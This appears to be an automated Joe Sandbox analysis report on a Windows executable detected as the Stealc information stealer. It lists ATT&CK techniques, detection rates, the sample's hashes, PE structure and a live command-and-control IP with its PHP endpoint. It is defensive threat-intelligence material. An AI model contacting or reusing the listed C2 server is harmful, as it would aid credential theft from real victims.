Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Software Packing	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	143 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
kNp6KbvVoz.exe	74%	ReversingLabs	Win32.Trojan.Stealc
kNp6KbvVoz.exe	61%	Virustotal		Browse
kNp6KbvVoz.exe	100%	Avira	HEUR/AGEN.1312567
kNp6KbvVoz.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe
https://docs.rs/getrandom#nodejs-es-module-support	0%	URL Reputation	safe
http://194.15.46.65/7e57db3b864b30f1.php	17%	Virustotal		Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://194.15.46.65/7e57db3b864b30f1.php	true	17%, Virustotal, Browse	unknown
http://194.15.46.65/	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://194.15.46.65	kNp6KbvVoz.exe, 00000000.00000002.2089693088.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://upx.sf.net	Amcache.hve.6.dr	false	URL Reputation: safe	unknown
http://194.15.46.65/stemDrive=C:SystemRoot=L	kNp6KbvVoz.exe, 00000000.00000002.2089693088.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://194.15.46.65/#Q-	kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://194.15.46.65b	kNp6KbvVoz.exe, 00000000.00000002.2089693088.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://194.15.46.65/_Q	kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://194.15.46.65/#	kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://194.15.46.65/D	kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://docs.rs/getrandom#nodejs-es-module-support	kNp6KbvVoz.exe, kNp6KbvVoz.exe, 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kNp6KbvVoz.exe, 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, kNp6KbvVoz.exe, 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.15.46.65	unknown	unknown		20952	VENUS-INTERNET-ASGB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544233
Start date and time:	2024-10-29 04:41:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	kNp6KbvVoz.exe renamed because original name is a hash value
Original Sample Name:	0c6e0d5c6de6558eab55ce5fad0b8acd.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/5@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 36 Number of non-executed functions: 189
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:42:38	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.15.46.65	uxnkmJzTjK.exe	Get hash	malicious	Stealc	Browse	194.15.46.65/
	jXMyT7jrfR.exe	Get hash	malicious	Stealc	Browse	194.15.46.65/7e57db3b864b30f1.php
	W9f3Fx6sL4.exe	Get hash	malicious	Stealc, Vidar	Browse	194.15.46.65/7e57db3b864b30f1.php
	nGmqbXROga.exe	Get hash	malicious	Stealc	Browse	194.15.46.65/7f031eb0d257b290.php
	t4GNf3V8mp.exe	Get hash	malicious	Stealc, Vidar	Browse	194.15.46.65/7f031eb0d257b290.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VENUS-INTERNET-ASGB	uxnkmJzTjK.exe	Get hash	malicious	Stealc	Browse	194.15.46.65
	jXMyT7jrfR.exe	Get hash	malicious	Stealc	Browse	194.15.46.65
	W9f3Fx6sL4.exe	Get hash	malicious	Stealc, Vidar	Browse	194.15.46.65
	nGmqbXROga.exe	Get hash	malicious	Stealc	Browse	194.15.46.65
	t4GNf3V8mp.exe	Get hash	malicious	Stealc, Vidar	Browse	194.15.46.65
	357oRnNepg.elf	Get hash	malicious	Unknown	Browse	217.138.142.250
	2jtSIERpll.elf	Get hash	malicious	Mirai	Browse	217.138.190.197
	luO0gwRNZ1.elf	Get hash	malicious	Mirai	Browse	217.138.190.173
	bPFO1DcK1x.elf	Get hash	malicious	Unknown	Browse	217.138.169.91
	KWnm2cUchM.elf	Get hash	malicious	Mirai	Browse	217.138.190.184

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_kNp6KbvVoz.exe_f5bb9ea57f41118ff9028f6b65fba858f0329_fde4ec36_2783d4ed-b81a-4a78-a482-9f28c8a6aa9e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9633936551253257
Encrypted:	false
SSDEEP:	192:6IKVdPJ1c08MZqdjMhZrMZtzuiFzZ24IO8P:DKVdPJ1X8MZqdjjTzuiFzY4IO8P
MD5:	399AC5DE8A76F66B80C2827EFC40E2AF
SHA1:	523E937676E6845F8C0E429973A0E33463383F35
SHA-256:	853A968BF1F668B138E52FA63B04FF07660645F93FDC477051C186992EE73922
SHA-512:	584F1DC5DFD8340024013DCD1FA4AD5508B67D601A4855CAD00DF702C8E3DD88CC96A49A793FC2A863E9B80B21395E3C7C80951EFD67EF305D6A86F76B5D6530
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.6.4.6.9.4.3.0.8.7.3.0.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.6.4.6.9.4.3.6.9.6.6.6.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.8.3.d.4.e.d.-.b.8.1.a.-.4.a.7.8.-.a.4.8.2.-.9.f.2.8.c.8.a.6.a.a.9.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.c.a.7.1.8.d.-.3.6.1.8.-.4.5.6.2.-.a.f.5.4.-.5.f.9.5.9.6.b.0.4.5.a.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.k.N.p.6.K.b.v.V.o.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.8.-.0.0.0.1.-.0.0.1.4.-.9.2.3.a.-.3.7.8.0.b.4.2.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.f.8.0.e.d.6.8.1.3.4.f.b.5.9.e.2.4.8.0.8.b.1.d.b.f.8.d.c.9.8.7.0.0.0.0.f.f.f.f.!.0.0.0.0.7.8.5.4.e.b.d.8.7.7.d.5.7.d.4.c.b.9.5.1.a.d.c.1.7.4.b.5.d.4.6.3.e.0.1.4.0.6.8.8.!.k.N.p.6.K.b.v.V.o.z...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2140.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 29 03:42:23 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	113242
Entropy (8bit):	1.7161386176840059
Encrypted:	false
SSDEEP:	384:UzNxv26EEsZzxNB2o1Azxk7xyqcUL07cMX38sUgpZ+/I:U7v26EE4zxNB2o1gqcULe8szZF
MD5:	B557D8864F75E7699F39DF14074C1BDE
SHA1:	8707108E599EA5CBD3FC8DB3AC78709072EE6BD4
SHA-256:	26C053F8E07354F39A8C33B96208F979591C8E330326FB380C7F26D015AF5355
SHA-512:	091E051AF9956BE7311EB7E586E2B9BDE39FE2984E7645DDBDD9D52C4C82459F217A7C94853E633959EE8055CA6C3B06F295306B2524F03CD16FD35AEC816E69
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........Y g.........................................E..........T.......8...........T............3..............t...........` ..............................................................................eJ....... ......GenuineIntel............T............Y g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER224B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8350
Entropy (8bit):	3.69652775937798
Encrypted:	false
SSDEEP:	192:R6l7wVeJLA6A6Y9pSU936gmfE5opDT89boBsfE4m:R6lXJM6A6YjSU936gmfE5Ro6fq
MD5:	740DB2199C64F0D306BC6664A450971D
SHA1:	0CFCC8A903E243B10C810F0C62EB35188D89D427
SHA-256:	E2A2334E02A7737DDED8DE64AE6D44E928D42624549B62BDA6FE3D593ADFDB36
SHA-512:	A8D6BE2D6AEDBF6B6B0191CDE505F995C2441F1345C8DB8C3E38B01FF4C13585070DE170BB19AD0372CA4E45226592BA295340D7016D4FD3F1DFEE13BDD3E172
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER22AA.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4583
Entropy (8bit):	4.4677163355026135
Encrypted:	false
SSDEEP:	48:cvIwWl8zsquJg77aI9gLWpW8VY+Ym8M4JPSeFUtKo+q87vzwl+ed:uIjflI7u67VmJPm9OLM+ed
MD5:	4F2DB436001E6D10BB54A7AFFB2AA430
SHA1:	AC8F5A6C89D5A46D2F927964FD4945FBD577457A
SHA-256:	31F241CBBCEAED594FAE1FA6E0D9B6F04E1B9AB206B3968F90C0BA916FC11DA5
SHA-512:	79531C744F1A2059E865B633409B90B3DA82A5190A0B86403725B6EA8155D3211EEB8BEB51B41C0D375C72B00FB3F34FC39337A6AE50E747A27927568326F8BC
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="564165" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465422378300488
Encrypted:	false
SSDEEP:	6144:ZIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNCdwBCswSbe:qXD94+WlLZMM6YFHY+e
MD5:	CE00A016F38F83540C24D0CB3A849C38
SHA1:	1DB961BBD8AB2F456E4B5894EFCE2A24241D68AB
SHA-256:	0F9BCB94B5C04DC9796D087638CA84B287EA49011C783332263A00CCD9CB64A8
SHA-512:	7BEFA571D14CB8F88C3109A46C4D8008E37D8A474890C830B971E77781277B3109EC4A55D9F6BCB399ECE7A458DAAAB2B7FDA11B54AE883A9B9D4D6FC7043402
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..R..)................................................................................................................................................................................................................................................................................................................................................E.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.278367766463905
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	kNp6KbvVoz.exe
File size:	746'496 bytes
MD5:	0c6e0d5c6de6558eab55ce5fad0b8acd
SHA1:	7854ebd877d57d4cb951adc174b5d463e0140688
SHA256:	49432b3c2186b051d35f09423075574cc82dbac403e5a69f311d4451a5a0e3b4
SHA512:	b9f5bb3942b093e48a16d7e556e2d145a7ce447e8fa789740772ac82719a5a0025121571750f8e7a30b30ea448dfc638d472d27680c61f02ce445bf39d5e051d
SSDEEP:	12288:dIAk5dkePe076dLUl2UL8ad53Kbp0auXd36ipkR0OhlPN5lYA5Ff7hA:sr76F8Pld8byL3zpkR0OhR3Ff7hA
TLSH:	E8F4DF5123F3EC06EEF68B715A3BC6F4252BBC625E3B526EB1043B1F19731A18951722
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........7@..d@..d@..d..3dB..d^.!da..d^.0dT..d^.&d1..dg5.dE..d@..d=..d^./dA..d^.1dA..d^.4dA..dRich@..d................PE..L....=.f...

File Icon


Icon Hash:	3518151211911409

Static PE Info

General

Entrypoint:	0x4017bc
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x66093DDC [Sun Mar 31 10:41:32 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	774b9ee29865bc65243d048a6e76d9ed

Entrypoint Preview

Instruction
call 00007F3378F56990h
jmp 00007F3378F526CEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0048FE40h], eax
mov dword ptr [0048FE3Ch], ecx
mov dword ptr [0048FE38h], edx
mov dword ptr [0048FE34h], ebx
mov dword ptr [0048FE30h], esi
mov dword ptr [0048FE2Ch], edi
mov word ptr [0048FE58h], ss
mov word ptr [0048FE4Ch], cs
mov word ptr [0048FE28h], ds
mov word ptr [0048FE24h], es
mov word ptr [0048FE20h], fs
mov word ptr [0048FE1Ch], gs
pushfd
pop dword ptr [0048FE50h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0048FE44h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0048FE48h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0048FE54h], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0048FD90h], 00010001h
mov eax, dword ptr [0048FE48h]
mov dword ptr [0048FD44h], eax
mov dword ptr [0048FD38h], C0000409h
mov dword ptr [0048FD3Ch], 00000001h
mov eax, dword ptr [0048C004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0048C008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000ECh]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a9ac	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2795000	0x24e28	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x89000	0x1bc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8755c	0x87600	964bd6b70c73731a8c90838b8e2a2cef	False	0.9220120614035088	data	7.843773564734436	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x89000	0x23d8	0x2400	c3529c9eb2946064b6b1ced13b8721c7	False	0.3800998263888889	data	5.648685953733001	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x8c000	0x2703b58	0x3e00	b779438e1964d6135c57a8c6d76b106c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pewume	0x2790000	0x4400	0x3800	b211778b80f6d441b6cf61ada776fc6d	False	0.0025809151785714285	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2795000	0x24e28	0x25000	add7adcbffd214436296c1afa6b85551	False	0.3869364970439189	data	4.867381185850408	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
MACEJUMANISESIHEPUTUZALUPASAJ	0x27ad7a8	0xbf7	ASCII text, with very long lines (3063), with no line terminators	Turkish	Turkey	0.6030035912504081
RT_CURSOR	0x27ae3c8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x27ae4f8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x27b0ac8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_CURSOR	0x27b1988	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x27b1ab8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x2795c80	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5583688699360341
RT_ICON	0x2796b28	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6272563176895307
RT_ICON	0x27973d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.668778801843318
RT_ICON	0x2797a98	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7398843930635838
RT_ICON	0x2798000	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.499896265560166
RT_ICON	0x279a5a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.5949812382739212
RT_ICON	0x279b650	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.5897540983606557
RT_ICON	0x279bfd8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7296099290780141
RT_ICON	0x279c4b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.3334221748400853
RT_ICON	0x279d360	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.3935018050541516
RT_ICON	0x279dc08	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.3980414746543779
RT_ICON	0x279e2d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.4067919075144509
RT_ICON	0x279e838	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.22022821576763485
RT_ICON	0x27a0de0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.25023452157598497
RT_ICON	0x27a1e88	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.28032786885245903
RT_ICON	0x27a2810	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.3076241134751773
RT_ICON	0x27a2cf0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.38832622601279315
RT_ICON	0x27a3b98	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.546028880866426
RT_ICON	0x27a4440	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6111751152073732
RT_ICON	0x27a4b08	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6307803468208093
RT_ICON	0x27a5070	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.40783302063789867
RT_ICON	0x27a6118	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.3975409836065574
RT_ICON	0x27a6aa0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.4379432624113475
RT_ICON	0x27a6f70	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.3419509594882729
RT_ICON	0x27a7e18	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.46525270758122744
RT_ICON	0x27a86c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.5034562211981567
RT_ICON	0x27a8d88	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.5144508670520231
RT_ICON	0x27a92f0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.42520746887966804
RT_ICON	0x27ab898	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.43363039399624764
RT_ICON	0x27ac940	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.43155737704918035
RT_ICON	0x27ad2c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.4530141843971631
RT_STRING	0x27b4238	0x12c	data			0.5266666666666666
RT_STRING	0x27b4368	0x5ae	data			0.4401650618982118
RT_STRING	0x27b4918	0x504	data			0.4462616822429907
RT_STRING	0x27b4e20	0x3f2	data			0.4603960396039604
RT_STRING	0x27b5218	0x706	data			0.42491657397107896
RT_STRING	0x27b5920	0x792	data			0.4231166150670795
RT_STRING	0x27b60b8	0x568	data			0.444364161849711
RT_STRING	0x27b6620	0x84e	data			0.4172154280338664
RT_STRING	0x27b6e70	0x830	data			0.4131679389312977
RT_STRING	0x27b76a0	0x896	data			0.41173794358507737
RT_STRING	0x27b7f38	0x624	data			0.4351145038167939
RT_STRING	0x27b8560	0x5e0	data			0.4401595744680851
RT_STRING	0x27b8b40	0x6e6	data			0.4292185730464326
RT_STRING	0x27b9228	0x67a	data			0.4312424607961399
RT_STRING	0x27b98a8	0x57e	data			0.4445234708392603
